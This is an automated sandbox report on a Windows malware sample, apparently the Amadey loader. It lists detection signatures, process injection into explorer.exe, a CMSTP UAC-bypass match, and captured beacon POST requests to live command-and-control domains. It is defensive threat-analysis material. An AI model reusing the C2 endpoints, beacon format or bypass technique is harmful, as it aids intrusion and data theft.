Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5Z1WFRMTOXRH6X21Z8NU8.exe

Overview

General Information

Sample name:5Z1WFRMTOXRH6X21Z8NU8.exe
Analysis ID:1542426
MD5:ff827141856089465cec7afdc9e65f9d
SHA1:e985a1d59d90a6522b4077b00bc68c86fc3d72d8
SHA256:389d5818cb26a1cc113481b66332d164dc76d2c85d8735c074a9bc2409b8c9c0
Tags:exeuser-aachum
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 5Z1WFRMTOXRH6X21Z8NU8.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\5Z1WFRMTOXRH6X21Z8NU8.exe" MD5: FF827141856089465CEC7AFDC9E65F9D)
    • more.com (PID: 7360 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 4348 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • logioptionsplus_updater.exe (PID: 7984 cmdline: C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe MD5: FF827141856089465CEC7AFDC9E65F9D)
  • logioptionsplus_updater.exe (PID: 8120 cmdline: "C:\Users\user\AppData\Roaming\LogiOptionsPlus\logioptionsplus_updater.exe" MD5: FF827141856089465CEC7AFDC9E65F9D)
    • more.com (PID: 8152 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • explorer.exe (PID: 3492 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
5Z1WFRMTOXRH6X21Z8NU8.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000007.00000002.2300617328.0000000001156000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              Click to see the 9 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                • 0x1dc88:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x1df14:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                • 0x1dd13:$s1: CoGetObject
                • 0x1df9f:$s1: CoGetObject
                • 0x1dc6c:$s2: Elevation:Administrator!new:
                • 0x1def8:$s2: Elevation:Administrator!new:
                1.2.more.com.4652b57.4.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  1.2.more.com.4652b57.4.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                  • 0x1dc88:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x1df14:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x1dd13:$s1: CoGetObject
                  • 0x1df9f:$s1: CoGetObject
                  • 0x1dc6c:$s2: Elevation:Administrator!new:
                  • 0x1def8:$s2: Elevation:Administrator!new:
                  16.2.explorer.exe.5211b57.6.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    Click to see the 30 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-25T22:43:37.141787+020028561471A Network Trojan was detected192.168.2.449838188.114.97.380TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-25T22:43:38.925555+020028561481A Network Trojan was detected192.168.2.449838188.114.97.380TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for submitted file
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeReversingLabs: Detection: 18%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\cnfpnterydeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\vkqcbyjdfiwJoe Sandbox ML: detected

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c60a8f.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.more.com.4652b57.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.explorer.exe.5211b57.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c6168f.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.more.com.460da8a.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.explorer.exe.4eccb57.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.logioptionsplus_updater.exe.115bf58.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.more.com.4650b57.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.more.com.460ba8a.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.explorer.exe.4e87a8a.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.5Z1WFRMTOXRH6X21Z8NU8.exe.4c1b9c2.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.explorer.exe.4ecd757.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.more.com.4653757.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.more.com.4651757.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.explorer.exe.5212757.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.explorer.exe.51cca8a.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.logioptionsplus_updater.exe.115bf58.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2300617328.0000000001156000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 5Z1WFRMTOXRH6X21Z8NU8.exe PID: 7308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: more.com PID: 7360, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: logioptionsplus_updater.exe PID: 7984, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: more.com PID: 8152, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4348, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3492, type: MEMORYSTR
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: sppcomapi.pdb source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
                    Source: Binary string: sppcomapi.pdbGCTL source: more.com, 00000001.00000002.2420220367.0000000005250000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933117360.0000000000DA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000010.00000002.2933809914.00000000001F2000.00000008.00000001.01000000.00000000.sdmp, cnfpnteryde.1.dr, vkqcbyjdfiw.12.dr
                    Source: Binary string: wntdll.pdbUGP source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2170108077.00000000054B0000.00000004.00000800.00020000.00000000.sdmp, 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2164119110.00000000046D8000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419589539.000000000425C000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419843860.0000000004700000.00000004.00001000.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933160736.0000000004254000.00000004.00000020.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933372891.0000000004700000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3582069173.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581630115.0000000004AD5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934043403.0000000004E10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934258001.00000000052C0000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0079ED13 FindFirstFileExW,14_2_0079ED13

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49838 -> 188.114.97.3:80
                    Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49838 -> 188.114.97.3:80
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
                    Source: global trafficHTTP traffic detected: POST /8bkjdSdfjCe/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: artvisions-autoinsider.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /8bkjdSdfjCe/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: artvisions-autoinsider.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 39 43 45 34 34 41 44 31 33 43 31 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 46 44 44 43 37 31 30 35 39 37 32 46 45 41 37 35 39 36 46 36 34 35 37 39 45 43 38 42 32 34 38 32 41 42 41 45 36 43 38 31 31 38 35 36 46 30 30 35 41 45 30 37 38 45 35 35 31 37 38 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A76659CE44AD13C1D58C48CF8B295278F7EBCB075A9634FFDDC7105972FEA7596F64579EC8B2482ABAE6C811856F005AE078E55178
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00770370 Sleep,Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,14_2_00770370
                    Source: global trafficDNS traffic detected: DNS query: artvisions-autoinsider3.com
                    Source: global trafficDNS traffic detected: DNS query: artvisions-autoinsider.com
                    Source: global trafficDNS traffic detected: DNS query: artvisions-autoinsider2.com
                    Source: unknownHTTP traffic detected: POST /8bkjdSdfjCe/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: artvisions-autoinsider.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider.com/5
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.php
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.php&
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.phpH
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider.com/8bkjdSdfjCe/index.phpQ
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php0
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002F16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.php?
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.phpM
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider2.com/Of093jhfhlpo2c/index.phpdu
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider2.com/c
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider3.com/
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EA7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider3.com/G8bjesde2/index.php
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider3.com/G8bjesde2/index.php(
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider3.com/G8bjesde2/index.phpP
                    Source: explorer.exe, 0000000E.00000002.3581166960.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://artvisions-autoinsider3.com/S
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: 5Z1WFRMTOXRH6X21Z8NU8.exe, 00000000.00000002.2166140131.0000000004C15000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2419731419.0000000004607000.00000004.00000800.00020000.00000000.sdmp, more.com, 0000000C.00000002.2933275124.0000000004605000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3581871941.0000000004E81000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.2934162913.00000000051C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
